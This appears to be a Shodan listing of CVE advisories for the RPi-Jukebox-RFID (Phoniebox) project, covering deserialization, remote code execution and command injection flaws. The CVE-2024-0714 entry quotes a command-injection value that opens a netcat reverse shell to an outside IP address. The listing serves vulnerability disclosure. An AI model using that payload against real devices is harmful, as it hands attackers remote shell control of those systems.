Shodan
Vulnerabilities
Vulnerable Software
Sourcefabric:  >> Phoniebox  Security Vulnerabilities
CVE-2025-63951
An insecure deserialization vulnerability exists in the rss-mp3.php script of the MiczFlor RPi-Jukebox-RFID project through commit 4b2334f0ae0e87c0568876fc41c48c38aa9a7014 (2025-10-07). The 'rss' GET parameter receives data that is passed directly to the unserialize() function without validation. This allows a remote, unauthenticated attacker to inject arbitrary PHP objects, causing the application to process them and leading to errors or a denial of service.
CVSS Score
7.5
EPSS Score
0.003
Published
2025-12-18
CVE-2024-41364
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\trackEdit.php
CVSS Score
9.8
EPSS Score
0.092
Published
2024-08-29
CVE-2024-41366
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\userScripts.php
CVSS Score
9.8
EPSS Score
0.092
Published
2024-08-29
CVE-2024-41367
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\api\playlist\appendFileToPlaylist.php
CVSS Score
9.8
EPSS Score
0.092
Published
2024-08-29
CVE-2024-41368
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\inc.setWlanIpMail.php
CVSS Score
9.8
EPSS Score
0.05
Published
2024-08-29
CVE-2024-41369
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\inc.setWifi.php
CVSS Score
9.8
EPSS Score
0.05
Published
2024-08-29
CVE-2024-41361
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\manageFilesFolders.php
CVSS Score
9.8
EPSS Score
0.092
Published
2024-08-29
CVE-2024-0714
A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
CVSS Score
6.3
EPSS Score
0.01
Published
2024-01-19


Products
Pricing
Contact Us

Shodan ® - All rights reserved